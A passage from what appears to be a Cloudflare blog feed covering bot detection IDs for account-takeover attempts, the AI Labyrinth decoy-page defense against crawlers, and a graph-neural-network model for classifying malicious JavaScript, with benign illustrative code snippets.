          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/9d7L1r7yN9AEhO26H7SgQ/434f0f934dd4f4498a8d13e85a7660ae/2.png" />
          </figure><p>Detections also include a specific tag describing the class of heuristic. Customers see these plotted over time in their analytics. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2UlkGQ070UWsmU76IXYqDd/6bca8f28959a8fe8f3013792a17b348a/image4.png" />
          </figure><p>To illustrate how this data can help give customers visibility into why we blocked a request, here’s an example request flagged by Bot Management (with the IP address, ASN, and country changed):</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3i6k9ejsBVwlbXUrZFIFJG/4c9cddd11d9f7a8ddf10eb5ff30a027b/4.png" />
          </figure><p>Before, seeing only that our heuristics gave the request a score of 1 was not very helpful in understanding why it was flagged as a bot. Adding our Detection IDs to Firewall Events paints a clearer picture: customers can see that we identified this request as a bot because the traffic used an empty User-Agent header. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5UQd20VnXCnIav1skHiX6i/18e0cf01106601ae7faf18be50d43365/5.png" />
          </figure><p>In addition to Analytics and Firewall Events, Bot Detection IDs are now available for Bot Management customers to use in Custom Rules, Rate Limiting Rules, Transform Rules, and Workers. </p>
    <div>
      <h4>Account takeover detection IDs</h4>
      <a href="#account-takeover-detection-ids">
        
      </a>
    </div>
    <p>One way we’re focused on improving Bot Management for our customers is by surfacing more attack-specific detections. During Birthday Week, we <a href="https://blog.cloudflare.com/a-safer-internet-with-cloudflare/"><u>launched Leaked Credentials Check</u></a> for all customers so that security teams could help <a href="https://www.cloudflare.com/zero-trust/solutions/account-takeover-prevention/"><u>prevent account takeover (ATO) attacks</u></a> by identifying accounts at risk due to leaked credentials. We’ve now added two more detections that can help Bot Management enterprise customers identify suspicious login activity via specific <a href="https://developers.cloudflare.com/bots/concepts/detection-ids/#account-takeover-detections"><u>detection IDs</u></a> that monitor login attempts and failures on the zone. These detection IDs do not currently affect the bot score, but will begin to later in 2025. Even so, they can already help customers detect account takeover events.</p><p>Detection ID <b>201326592 </b>monitors traffic on a customer website and looks for an anomalous rise in login failures (usually associated with brute force attacks), and ID <b>201326593 </b>looks for an anomalous rise in login attempts (usually associated with credential stuffing). </p>
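<p>For example, a customer could reference these IDs directly in a rule expression and pair it with a challenge or rate-limiting action. The sketch below assumes the <code>cf.bot_management.detection_ids</code> array field described in the detection IDs documentation linked above:</p><pre><code>any(cf.bot_management.detection_ids[*] eq 201326592)
or any(cf.bot_management.detection_ids[*] eq 201326593)</code></pre>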
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4a2LGgB1bXGwFgHQEKFSI9/ff4194a6a470e466274f7b7c51e9dc18/6.png" />
          </figure>
    <div>
      <h3>Protect your applications</h3>
      <a href="#protect-your-applications">
        
      </a>
    </div>
    <p>If you are a Bot Management customer, log in to the Cloudflare dashboard and look in Security Analytics for bot detection IDs <code>201326592</code> and <code>201326593</code>.</p><p>These will highlight ATO attempts targeting your site. If you spot anything suspicious, or would like to be protected against future attacks, create a rule that uses these detections to keep your application safe.</p> ]]></content:encoded>
            <category><![CDATA[Security Week]]></category>
            <category><![CDATA[Bots]]></category>
            <category><![CDATA[Bot Management]]></category>
            <category><![CDATA[Application Security]]></category>
            <category><![CDATA[Machine Learning]]></category>
            <category><![CDATA[Heuristics]]></category>
            <category><![CDATA[Edge Rules]]></category>
            <category><![CDATA[Security]]></category>
            <guid isPermaLink="false">4IkgXzyemEEsN7A6Cd18hb</guid>
            <dc:creator>Curtis Lowder</dc:creator>
            <dc:creator>Brian Mitchell</dc:creator>
            <dc:creator>Adam Martinetti</dc:creator>
        </item>
        <item>
            <title><![CDATA[Trapping misbehaving bots in an AI Labyrinth]]></title>
            <link>https://blog.cloudflare.com/ai-labyrinth/</link>
            <pubDate>Wed, 19 Mar 2025 13:00:00 GMT</pubDate>
            <description><![CDATA[ How Cloudflare uses generative AI to slow down, confuse, and waste the resources of AI Crawlers and other bots that don’t respect “no crawl” directives. ]]></description>
            <content:encoded><![CDATA[ <p>Today, we’re excited to announce AI Labyrinth, a new mitigation approach that uses AI-generated content to slow down, confuse, and waste the resources of AI Crawlers and other bots that don’t respect “no crawl” directives. When you opt in, Cloudflare will automatically deploy an AI-generated set of linked pages when we detect inappropriate bot activity, without the need for customers to create any custom rules.</p><p>AI Labyrinth is available on an opt-in basis to all customers, including the <a href="https://www.cloudflare.com/plans/free/">Free plan</a>.</p>
    <div>
      <h3>Using Generative AI as a defensive weapon</h3>
      <a href="#using-generative-ai-as-a-defensive-weapon">
        
      </a>
    </div>
    <p>AI-generated content has exploded, reportedly accounting for <a href="https://www.thetimes.co.uk/article/why-ai-content-everywhere-how-to-detect-l2m2kdx9p"><u>four of the top 20 Facebook posts</u></a> last fall. Additionally, Medium estimates that <a href="https://www.wired.com/story/ai-generated-medium-posts-content-moderation/"><u>47% of all content</u></a> on their platform is AI-generated. Like any newer tool, it has both wonderful and <a href="https://www.npr.org/2024/12/24/nx-s1-5235265/how-to-protect-yourself-from-holiday-ai-scams"><u>malicious</u></a> uses.</p><p>At the same time, we’ve also seen an explosion of new crawlers used by AI companies to scrape data for model training. AI Crawlers generate more than 50 billion requests to the Cloudflare network every day, or just under 1% of all web requests we see. While Cloudflare has several tools for <a href="https://www.cloudflare.com/learning/ai/how-to-block-ai-crawlers/"><u>identifying and blocking unauthorized AI crawling</u></a>, we have found that blocking malicious <a href="https://www.cloudflare.com/learning/bots/what-is-a-bot/">bots</a> can alert the attacker that you are on to them, leading to a shift in approach and a never-ending arms race. So, we wanted to create a new way to thwart these unwanted bots, without letting them know they’ve been thwarted.</p>
Any visitor that does is very likely to be a bot, so this gives us a brand-new tool to identify and fingerprint bad bots, which we add to our list of known bad actors. Here’s how we do it…</p>
    <div>
      <h3>How we built the labyrinth </h3>
      <a href="#how-we-built-the-labyrinth">
        
      </a>
    </div>
    <p>When AI crawlers follow these links, they waste valuable computational resources processing irrelevant content rather than extracting your legitimate website data. This significantly reduces their ability to gather enough useful information to train their models effectively.</p><p>To generate convincing human-like content, we used <a href="https://developers.cloudflare.com/workers-ai/"><u>Workers AI</u></a> with an open source model to create unique HTML pages on diverse topics. Rather than creating this content on-demand (which could impact performance), we implemented a pre-generation pipeline that sanitizes the content to<a href="https://www.cloudflare.com/learning/security/how-to-prevent-xss-attacks/"> prevent any XSS vulnerabilities</a>, and stores it in <a href="https://www.cloudflare.com/developer-platform/products/r2/">R2</a> for faster retrieval. We found that generating a diverse set of topics first, then creating content for each topic, produced more varied and convincing results. It is important to us that we don’t generate inaccurate content that contributes to the spread of misinformation on the Internet, so the content we generate is real and related to scientific facts, just not relevant or proprietary to the site being crawled.</p><p>This pre-generated content is seamlessly integrated as hidden links on existing pages via our custom HTML transformation process, without disrupting the original structure or content of the page. Each generated page includes appropriate meta directives to protect SEO by preventing search engine indexing. We also ensured that these links remain invisible to human visitors through carefully implemented attributes and styling. To further minimize the impact to regular visitors, we ensured that these links are presented only to suspected AI scrapers, while allowing legitimate users and verified crawlers to browse normally.</p>
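<p>To make the idea concrete, here is a minimal sketch (not Cloudflare's actual HTML transformation, and every name in it is illustrative) of injecting a link that stays invisible to human visitors; the decoy pages themselves would carry the meta directives that block search-engine indexing.</p>

```python
# Illustrative sketch only: append a decoy link that humans never see.
def inject_decoy_link(html: str, decoy_url: str) -> str:
    # display:none, aria-hidden, and tabindex=-1 hide the link from human
    # visitors; rel="nofollow" discourages well-behaved crawlers from following.
    link = (
        f'<a href="{decoy_url}" rel="nofollow" aria-hidden="true" '
        'tabindex="-1" style="display:none">.</a>'
    )
    # Insert just before the closing body tag, leaving the page otherwise intact.
    return html.replace("</body>", link + "</body>", 1)

page = "<html><body><p>Checkout</p></body></html>"
decoyed = inject_decoy_link(page, "https://example.com/maze/a1")
```

<p>A real deployment would of course decide per-request whether to inject at all, serving the decoy only to suspected scrapers.</p>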
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2PHSCXVMFipAhGJ5IheXW3/a46aad93f2e60f6d892d4c597a752a58/image4.png" />
          </figure><p><sup><i>A graph of daily requests over time, comparing different categories of AI Crawlers.</i></sup></p><p>What makes this approach particularly effective is its role in our continuously evolving bot detection system. When these links are followed, we know with high confidence that it's automated crawler activity, as human visitors and legitimate browsers would never see or click them. This provides us with a powerful identification mechanism, generating valuable data that feeds into our <a href="https://www.cloudflare.com/learning/ai/what-is-machine-learning/">machine learning models</a>. By analyzing which crawlers are following these hidden pathways, we can identify new bot patterns and signatures that might otherwise go undetected. This proactive approach helps us <a href="https://www.cloudflare.com/learning/ai/how-to-prevent-web-scraping/">stay ahead of AI scrapers</a>, continuously improving our detection capabilities without disrupting the normal browsing experience.</p><p>By building this solution on our developer platform, we've created a system that serves convincing decoy content instantly while maintaining consistent quality, all without impacting your site's performance or user experience.</p>
    <div>
      <h3>How to use AI Labyrinth to stop AI crawlers</h3>
      <a href="#how-to-use-ai-labyrinth-to-stop-ai-crawlers">
        
      </a>
    </div>
    <p>Enabling AI Labyrinth is simple and requires just a single toggle in your Cloudflare dashboard. Navigate to the bot management section within your zone, and toggle the new AI Labyrinth setting to on:</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/q1ZQlnnMztSsK8PWD1h0S/ef02f081544dc751f754e9630f17261e/image1.png" />
          </figure>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/61qBVDv0WFh8YzrbVULtxq/13ec46d7651c59454f9fe3754e253b85/image3.png" />
          </figure><p>Once enabled, the AI Labyrinth begins working immediately with no additional configuration needed.</p>
    <div>
      <h3>AI honeypots, created by AI</h3>
      <a href="#ai-honeypots-created-by-ai">
        
      </a>
    </div>
    <p>The core benefit of AI Labyrinth is to confuse and distract bots. However, a secondary benefit is to serve as a next-generation honeypot. In this context, a honeypot is just an invisible link that a website visitor can’t see, but a bot parsing HTML would see and click on, therefore revealing itself to be a bot. Honeypots have been used to catch hackers as early as the <a href="https://medium.com/@jcart657/the-cuckoos-egg-9b502442ea67"><u>1986 Cuckoo’s Egg incident</u></a>. And in 2004, <a href="https://www.projecthoneypot.org/"><u>Project Honeypot</u></a> was created by Cloudflare founders (prior to founding Cloudflare) to let everyone easily deploy free email honeypots, and receive lists of crawler IPs in exchange for contributing to the database. But as bots have evolved, they now proactively look for honeypot techniques like hidden links, making this approach less effective.</p><p>AI Labyrinth won’t simply add invisible links, but will eventually create whole networks of linked URLs that are much more realistic, and not trivial for automated programs to spot. The content on the pages is obviously content no human would spend time consuming, but AI bots are programmed to crawl rather deeply to harvest as much data as possible. When bots hit these URLs, we can be confident they aren’t actual humans, and this information is recorded and automatically fed to our machine learning models to help improve our bot identification. This creates a beneficial feedback loop where each scraping attempt helps protect all Cloudflare customers.</p>
    <div>
      <h3>What’s next</h3>
      <a href="#whats-next">
        
      </a>
    </div>
    <p>This is only our first iteration of using generative AI to thwart bots. Currently, while the content we generate is convincingly human, it won’t conform to the existing structure of every website. In the future, we’ll continue to work to make these links harder to spot and make them fit seamlessly into the existing structure of the website they’re embedded in. You can help us by opting in now.</p><p>To take the next step in the fight against bots, <a href="https://dash.cloudflare.com/?to=/:account/:zone/security/detections/bot-traffic"><u>opt in to AI Labyrinth</u></a> today.</p> ]]></content:encoded>
            <category><![CDATA[Security Week]]></category>
            <category><![CDATA[Bots]]></category>
            <category><![CDATA[Bot Management]]></category>
            <category><![CDATA[AI Bots]]></category>
            <category><![CDATA[AI]]></category>
            <category><![CDATA[Machine Learning]]></category>
            <category><![CDATA[Generative AI]]></category>
            <guid isPermaLink="false">1Zh4fm4BB1S3xuVwfETiTE</guid>
            <dc:creator>Reid Tatoris</dc:creator>
            <dc:creator>Harsh Saxena</dc:creator>
            <dc:creator>Luis Miglietti</dc:creator>
        </item>
        <item>
            <title><![CDATA[How we train AI to uncover malicious JavaScript intent and make web surfing safer]]></title>
            <link>https://blog.cloudflare.com/how-we-train-ai-to-uncover-malicious-javascript-intent-and-make-web-surfing-safer/</link>
            <pubDate>Wed, 19 Mar 2025 13:00:00 GMT</pubDate>
            <description><![CDATA[ Learn more about how Cloudflare developed an AI model to uncover malicious JavaScript intent using a Graph Neural Network, from pre-processing data to inferencing at scale.  ]]></description>
            <content:encoded><![CDATA[ <p>Modern websites <a href="https://blog.cloudflare.com/application-security-report-2024-update/#enterprise-applications-use-47-third-party-scripts-on-average"><u>rely heavily</u></a> on JavaScript. Leveraging third-party scripts accelerates web app development, enabling organizations to deploy new features faster without building everything from scratch. However, supply chain attacks targeting third-party JavaScript are no longer just a theoretical concern — they have become a reality, as <a href="https://blog.cloudflare.com/polyfill-io-now-available-on-cdnjs-reduce-your-supply-chain-risk/"><u>recent incidents</u></a> have shown. Given the vast number of scripts and the rapid pace of updates, manually reviewing each one is not a scalable security strategy.</p><p>Cloudflare provides automated client-side protection through <a href="https://developers.cloudflare.com/page-shield/"><u>Page Shield</u></a>. Until now, Page Shield could scan JavaScript dependencies on a web page, flagging script content that is obfuscated or that exfiltrates data. However, these are only indirect indicators of compromise or malicious intent. Our original approach didn’t provide clear insights into a script’s specific malicious objectives or the type of attack it was designed to execute.</p><p>Taking things a step further, we have developed a new AI model that allows us to detect the exact malicious intent behind each script. This intelligence is now integrated into Page Shield, available to all Page Shield <a href="https://developers.cloudflare.com/page-shield/#availability"><u>add-on</u></a> customers. We are starting with three key threat categories: <a href="https://en.wikipedia.org/wiki/Web_skimming"><u>Magecart</u></a>, crypto mining, and malware.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6EefJpCcho3DIjbVbQIjuz/68852b905955065e48ec2aa4648621cd/1.png" />
          </figure><p><sup><i>Screenshot of Page Shield dashboard showing results of three types of analysis.</i></sup></p><p>With these improvements, Page Shield provides deeper visibility into client-side threats, empowering organizations to better protect their users from evolving security risks. This new capability is available to all Page Shield customers with the <a href="https://developers.cloudflare.com/page-shield/#availability"><u>add-on</u></a>. Head over <a href="https://dash.cloudflare.com/?to=/:account/:zone/security/page-shield"><u>to the dashboard</u></a>, and you can find the new malicious code analysis for each of the scripts monitored.</p><p>In the following sections, we take a deep dive into how we developed this model.</p>
    <div>
      <h3>Training the model to detect hidden malicious intent</h3>
      <a href="#training-the-model-to-detect-hidden-malicious-intent">
        
      </a>
    </div>
    <p>We built this new Page Shield AI model to detect the intent of JavaScript threats at scale. Training such a model for JavaScript comes with unique challenges, including dealing with web code written in many different styles, often obfuscated yet benign. For instance, the following three snippets serve the same function.</p>
            <pre><code>//Readable, plain code
function sayHi(name) {
  console.log(
    `Hello ${
      name ?? 
      "World" //default
    }!`
  );
}
sayHi("Internet");

//Minified
function sayHi(l){console.log(`Hello ${l??"World"}!`)}sayHi("Internet");

//Obfuscated
var h=Q;(function(V,A){var J=Q,p=V();while(!![]){try{var b=-parseInt(J('0x79'))/0x1*(-parseInt(J('0x6e'))/0x2)+-parseInt(J('0x80'))/0x3+parseInt(J('0x76'))/0x4*(-parseInt(J('0x72'))/0x5)+parseInt(J('0x6a'))/0x6+parseInt(J('0x84'))/0x7+-parseInt(J('0x6d'))/0x8*(-parseInt(J('0x7d'))/0x9)+parseInt(J('0x73'))/0xa*(-parseInt(J('0x7c'))/0xb);if(b===A)break;else p['push'](p['shift']());}catch(U){p['push'](p['shift']());}}}(S,0x22097));function sayHi(p){var Y=Q,b=(function(){var W=!![];return function(e,x){var B=W?function(){var m=Q;if(x){var G=x[m('0x71')](e,arguments);return x=null,G;}}:function(){};return W=![],B;};}()),U=b(this,function(){var s=Q,W=typeof window!==s('0x6b')?window:typeof process===s('0x6c')&amp;&amp;typeof require===s('0x7b')&amp;&amp;typeof global==='object'?global:this,e=W['console']=W['console']||{},x=[s('0x78'),s('0x70'),'info',s('0x69'),s('0x77'),'table',s('0x7f')];for(var B=0x0;B&lt;x[s('0x83')];B++){var G=b[s('0x75')][s('0x6f')][s('0x74')](b),t=x[B],X=e[t]||G;G['__proto__']=b[s('0x74')](b),G['toString']=X[s('0x7e')]['bind'](X),e[t]=G;}});U(),console['log'](Y('0x81')+(p??Y('0x7a'))+'!');}sayHi(h('0x82'));function Q(V,A){var p=S();return Q=function(b,U){b=b-0x69;var W=p[b];return W;},Q(V,A);}function S(){var v=['Internet','length','77966Hcxgji','error','1078032RtaGFM','undefined','object','8zrzBEk','244xEPFaR','prototype','warn','apply','10LQgYRU','400TNVOzq','bind','constructor','146612cfnkCX','exception','log','1513TBJIGL','World','function','57541MkoqrR','2362383dtBFrf','toString','trace','647766YvOJOm','Hello\x20'];S=function(){return v;};return S();}</code></pre>
            <p>With such a variance of styles (and many more), our machine learning solution needs to balance precision (low false positive rate), recall (don’t miss an attack vector), and speed. Here’s how we do it:</p>
    <div>
      <h4>Using syntax trees to classify malicious code</h4>
      <a href="#using-syntax-trees-to-classify-malicious-code">
        
      </a>
    </div>
    <p>JavaScript files are parsed into <a href="https://en.wikipedia.org/wiki/Tree_(graph_theory)"><u>syntax trees (connected acyclic graphs)</u></a>. These serve as the input to a <a href="https://en.wikipedia.org/wiki/Graph_neural_network"><u>Graph Neural Network (GNN)</u></a>. GNNs are used because they effectively capture the interdependencies (relationships between nodes) in executing code, such as a function calling another function. This contrasts with treating the code as merely a sequence of words — something a code compiler, incidentally, does not do. Another motivation to use GNNs is the <a href="https://dl.acm.org/doi/10.1007/978-3-030-92270-2_57"><u>insight</u></a> that the syntax trees of malicious versus benign JavaScript tend to be different. For example, it’s not rare to find attacks that consist of malicious snippets inserted into, but otherwise isolated from, the rest of a benign base code.</p><p>To parse the files, the <a href="https://tree-sitter.github.io/"><u>tree-sitter library</u></a> was chosen for its speed. One peculiarity of this parser, specialized for text editors, is that it parses out <a href="https://en.wikipedia.org/wiki/Parse_tree"><u>concrete syntax trees (CST)</u></a>. CSTs retain everything from the original text input, including spacing information, comments, and even nodes attempting to repair syntax errors. This differs from <a href="https://en.wikipedia.org/wiki/Abstract_syntax_tree"><u>abstract syntax trees (AST)</u></a>, the data structures used in compilers, which have just the essential information to execute the underlying code while ignoring the rest. One key reason for wanting to convert the CST to an AST-like structure is that it reduces the tree size, which in turn reduces computation and memory usage. To do that, we abstract and filter out unnecessary nodes such as code comments. Consider, for instance, how the following snippet</p>
            <pre><code>x = `result: ${(10+5) *   3}`;;; //this is a comment</code></pre>
            <p>… gets converted to an AST-like representation:</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4KweWZ4yIzOTiIcYqHC682/56c059b38ad46949e7285d84438be4c9/2.png" />
          </figure><p><sup><i>Abstract Syntax Tree (AST) representation of the sample code above. Unnecessary elements get removed (e.g. comments, spacing) whereas others get encoded in the tree structure (order of operations due to parentheses).</i></sup></p><p>One benefit of working with parsed syntax trees is that <a href="https://huggingface.co/learn/nlp-course/en/chapter2/4"><u>tokenization</u></a> comes for free! We collect and treat the node leaves’ text as our tokens, which will be used as features (inputs) for the machine learning model. Note that multiple characters in the original input, for instance backticks to form a template string, are not treated as tokens per se, but remain encoded in the graph structure given to the GNN. (Notice in the sample tree representations the different node types, such as “assignment_expression”). Moreover, some details in the exact text input become irrelevant in the executing AST, such as whether a string was originally written using double quotes vs. single quotes.</p><p>We encode the node tokens and node types into a matrix of counts. Currently, we lowercase the nodes' text to reduce vocabulary size, improving efficiency and reducing sparsity. Note that JavaScript is a case-sensitive language, so this is a trade-off we continue to explore. This matrix and, importantly, the information about the node edges within the tree, is the input to the GNN.</p><p>How do we deal with obfuscated code? We don’t treat it specially. Rather, we always parse the JavaScript text as is, which incidentally unescapes <a href="https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Regular_expressions/Character_escape"><u>escape characters</u></a> too. For instance, the resulting AST shown below for the following input exemplifies that:</p>
            <pre><code>atob('\x55\x32\x56\x75\x5a\x45\x52\x68\x64\x47\x45\x3d') == "SendData"</code></pre>
            
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/sV2qPtj8G30EFnW6rwCav/ef0a970e338e5610da08fa3ccbdeafcc/3.png" />
          </figure><p><sup><i>Abstract Syntax Tree (AST) representation of the sample code above. JavaScript escape characters are unescaped.</i></sup></p><p>Moreover, our vocabulary contains several tokens that are commonly used in obfuscated code, such as double escaped hexadecimal-encoded characters. That, together with the graph structure information, gives us satisfying results: the model successfully classifies malicious code whether it's obfuscated or not. Analogously, the model’s scores remain stable when a plain benign script is compared against obfuscated versions of itself. In other words, the model’s score on a script is similar to its score on an obfuscated version of the same script. Having said that, some of our model's false positives (FPs) originate from benign but obfuscated code, so we continue to investigate how we can improve our model's intelligence.</p>
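<p>The CST pruning and leaf tokenization described above can be sketched with plain dictionaries standing in for tree-sitter nodes (the node-type names here are illustrative, not tree-sitter's exact grammar):</p>

```python
# Illustrative sketch: reduce a CST to an AST-like tree, then collect tokens.
DROP = {"comment"}  # node types abstracted away when reducing the CST

def prune(node):
    """Drop comment nodes; keep the rest of the tree structure intact."""
    if node["type"] in DROP:
        return None
    kids = [p for c in node.get("children", []) if (p := prune(c)) is not None]
    return {"type": node["type"], "text": node.get("text", ""), "children": kids}

def leaf_tokens(node, out=None):
    """Collect lowercased leaf text as features for the model."""
    out = [] if out is None else out
    if not node["children"]:
        out.append(node["text"].lower())
    for c in node["children"]:
        leaf_tokens(c, out)
    return out

cst = {"type": "program", "children": [
    {"type": "comment", "text": "//this is a comment", "children": []},
    {"type": "assignment_expression", "children": [
        {"type": "identifier", "text": "x", "children": []},
        {"type": "number", "text": "10", "children": []},
    ]},
]}
ast_like = prune(cst)
tokens = leaf_tokens(ast_like)  # ['x', '10']
```

<p>The edge structure of the pruned tree, not shown here, is what gets handed to the GNN alongside the token counts.</p>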
    <div>
      <h4>Architecting the Graph Neural Network</h4>
      <a href="#architecting-the-graph-neural-network">
        
      </a>
    </div>
    <p>We train a <a href="https://mbernste.github.io/posts/gcn/"><u>message-passing graph convolutional network (MPGCN)</u></a> that processes the input trees. The message-passing layers iteratively update each node’s internal representation, encoded in a matrix, by aggregating information from its neighbors (parent and child nodes in the tree). A pooling layer then condenses this matrix into a feature vector, discarding the explicit graph structure (edge connections between nodes). At this point, standard neural network layers, such as fully connected layers, can be applied to progressively refine the representation. Finally, a <a href="https://en.wikipedia.org/wiki/Softmax_function"><u>softmax activation</u></a> layer produces a probability distribution over the four possible classes: benign, magecart, cryptomining, and malware.</p><p>We use the <a href="https://github.com/tensorflow/gnn"><u>TF-GNN library</u></a> to implement graph neural networks, with <a href="https://keras.io/"><u>Keras</u></a> serving as the high-level frontend for model building and training. This works well for us with one exception: <a href="https://github.com/tensorflow/gnn/issues/803#issue-2279602052"><u>TF-GNN does not support sparse matrices / tensors</u></a>. (That lack of support increases memory consumption, which also adds some latency.) Because of this, we are considering switching to <a href="https://pytorch-geometric.readthedocs.io/"><u>PyTorch Geometric</u></a> instead.</p>
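<p>As a toy illustration of that architecture (plain NumPy with random, untrained weights; this is not the TF-GNN model), one message-passing round, mean pooling, and a softmax over the four classes can be sketched as:</p>

```python
import numpy as np

rng = np.random.default_rng(0)

# Toy tree with 4 nodes; symmetric adjacency matrix with self-loops,
# row-normalized so each node averages over itself and its tree neighbours.
A = np.array([[1, 1, 1, 0],
              [1, 1, 0, 1],
              [1, 0, 1, 0],
              [0, 1, 0, 1]], dtype=float)
A = A / A.sum(axis=1, keepdims=True)

H = rng.normal(size=(4, 8))    # initial node features (e.g. encoded token counts)
W1 = rng.normal(size=(8, 8))   # message-passing layer weights
W2 = rng.normal(size=(8, 4))   # output layer: benign, magecart, cryptomining, malware

H = np.maximum(A @ H @ W1, 0.0)  # one message-passing round with ReLU
g = H.mean(axis=0)               # pooling: collapse the graph to one feature vector
logits = g @ W2
probs = np.exp(logits - logits.max())
probs = probs / probs.sum()      # softmax over the four classes
```

<p>The real model stacks several such layers and refines the pooled vector through fully connected layers before the softmax.</p>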
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/79SbvJgWq3mwMks6Vtxpgs/5ab55f19b6cf90dc070b5f0d70abdde9/4.png" />
          </figure><p><sup><i>Graph neural network architecture, transforming the input tree with features down to the 4 classification probabilities.</i></sup></p><p>The model’s output probabilities are finally inverted and scaled into <a href="https://developers.cloudflare.com/page-shield/how-it-works/malicious-script-detection/#malicious-script-detection"><u>scores</u></a> (ranging from 1 to 99). The “js_integrity” score aggregates the malicious classes (magecart, malware, cryptomining). A low score means likely malicious, and a high score means likely benign. We use this output format for consistency with other Cloudflare detection systems, such as <a href="https://developers.cloudflare.com/page-shield/how-it-works/malicious-script-detection/#malicious-script-detection"><u>Bot Management</u></a> and the <a href="https://developers.cloudflare.com/waf/detections/attack-score/"><u>WAF Attack Score</u></a>. The following diagram illustrates the preprocessing and feature analysis pipeline of the model down to the inference results.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/zLPW9kydBIJySfjaN2TTI/d7b9a7f51c1bb501aac2b7a724d62a1d/5.png" />
          </figure><p><sup><i>Model inference pipeline to sniff out and alert on malicious JavaScript.</i></sup></p>
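<p>The inversion into 1–99 scores can be illustrated with a hypothetical linear mapping (the exact scaling Cloudflare uses is not published here): the three malicious class probabilities are aggregated, and a higher chance of malice yields a lower score.</p>

```python
def js_integrity_score(probs: dict) -> int:
    # Hypothetical linear mapping, for illustration only: aggregate the
    # malicious classes, then invert into the 1-99 range.
    p_malicious = probs["magecart"] + probs["cryptomining"] + probs["malware"]
    return round(1 + 98 * (1.0 - p_malicious))

js_integrity_score(
    {"benign": 1.0, "magecart": 0.0, "cryptomining": 0.0, "malware": 0.0}
)  # 99
```
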
    <div>
      <h4>Tackling unbalanced data: malicious scripts are the minority</h4>
      <a href="#tackling-unbalanced-data-malicious-scripts-are-the-minority">
        
      </a>
    </div>
    <p>Finding malicious scripts is like finding a needle in a haystack; they are anomalies among plenty of otherwise benign JavaScript. This naturally results in a highly imbalanced dataset. For example, our Magecart-labeled scripts only account for ~6% of the total dataset.</p><p>Not only that, but the “benign” category contains an immense variance (and amount) of JavaScript to classify. The lengths of the scripts are highly diverse (ranging from just a few bytes to several megabytes), their coding styles vary widely, some are obfuscated whereas others are not, etc. To make matters worse, malicious payloads are often just small, carefully inserted fragments within an otherwise perfectly valid and functional benign script. This all creates a cacophony of token distributions for an ML model to make sense of.</p><p>Still, our biggest problem remains finding enough malevolent JavaScript to add to our training dataset. Thus, simplifying it, our strategy for data collection and annotation is two-fold:</p><ol><li><p>Malicious scripts are about quantity → the more, the merrier (for our model, that is 😉). Of course, we still care about quality and diversity. But because we have so few of them (in comparison to the number of benign scripts), we take what we can.</p></li><li><p>Benign scripts are about quality → the more <i>variance</i>, the merrier. Here we have the opposite situation. Because we can collect so many of them easily, the value is in adding differentiated scripts.</p></li></ol>
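<p>One standard remedy for this kind of imbalance is inverse-frequency class weighting, so that rare classes such as Magecart contribute more per-sample loss than the abundant benign class. The post does not state which technique is used in training, so treat this purely as an illustration:</p>

```python
from collections import Counter

def class_weights(labels):
    # Inverse-frequency weighting: weight for class c is total / (n_classes * count_c),
    # so rarer classes receive proportionally larger weights.
    counts = Counter(labels)
    total = sum(counts.values())
    n = len(counts)
    return {c: total / (n * k) for c, k in counts.items()}

# Mimic the imbalance mentioned above: ~6% magecart vs. benign.
labels = ["benign"] * 94 + ["magecart"] * 6
w = class_weights(labels)
```
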
    <div>
      <h5>Learning key scripts only: reduce false positives with minimal annotation time</h5>
      <a href="#learning-key-scripts-only-reduce-false-positives-with-minimal-annotation-time">
        
      </a>
    </div>
    <p>To filter out semantically similar scripts (mostly benign), we employed the latest advancements in LLMs for generating code <a href="https://www.cloudflare.com/learning/ai/what-are-embeddings/"><u>embeddings</u></a>. We added to our dataset only those scripts that are distant enough from each other, as measured by <a href="https://developers.cloudflare.com/vectorize/best-practices/create-indexes/#distance-metrics"><u>vector cosine similarity</u></a>. Our methodology is simple. For a batch of potentially new scripts:</p><ul><li><p>Initialize an empty <a href="https://www.cloudflare.com/learning/ai/what-is-vector-database/"><u>vector database</u></a>. For local experimentation, we are fans of <a href="https://docs.trychroma.com/docs/overview/introduction"><u>Chroma DB</u></a>.</p></li><li><p>For each script:</p><ul><li><p>Call an LLM to generate its embedding. We’ve had good results with <a href="https://github.com/bigcode-project/starcoder2"><u>starcoder2</u></a>, and most recently <a href="https://huggingface.co/Qwen/Qwen2.5-Coder-32B"><u>qwen2.5-coder</u></a>.</p></li><li><p>Search the database for the closest (top-1) existing script vector.</p></li><li><p>If the distance is greater than a threshold (0.10), select the script and add it to the database.</p></li><li><p>Else, discard the script (though we consider it for further validations and tests).</p></li></ul></li></ul><p>Although this methodology has an inherent bias in gradually favoring the first-seen scripts, in practice we’ve used it for batches of newly and randomly sampled JavaScript only. 
To review the whole existing dataset, we could employ other, similar strategies, like applying <a href="https://scikit-learn.org/stable/modules/generated/sklearn.cluster.HDBSCAN.html"><u>HDBSCAN</u></a> to identify an unknown number of clusters and then selecting the medoids, boundary, and anomaly data points.</p><p>We’ve successfully employed this strategy for pinpointing a few highly varied scripts that were relevant for the model to learn from. Our security researchers save a tremendous amount of time on manual annotation, while false positives are drastically reduced. For instance, in a large and unlabeled bucket of scripts, one of our early evaluation models identified ~3,000 of them as malicious. That’s too many to manually review! By removing near duplicates, we narrowed the need for annotation down to only 196 samples, less than 7% of the original amount (see the <a href="https://en.wikipedia.org/wiki/T-distributed_stochastic_neighbor_embedding"><u>t-SNE</u></a> visualization below of selected points and clusters). Three of those scripts were actually malicious, one we could not fully determine, and the rest were benign. Just by re-training with these new labeled scripts, a tiny fraction of our whole dataset, we reduced false positives by 50% (as gauged in the same bucket and in a controlled test set). We have consistently repeated this procedure to 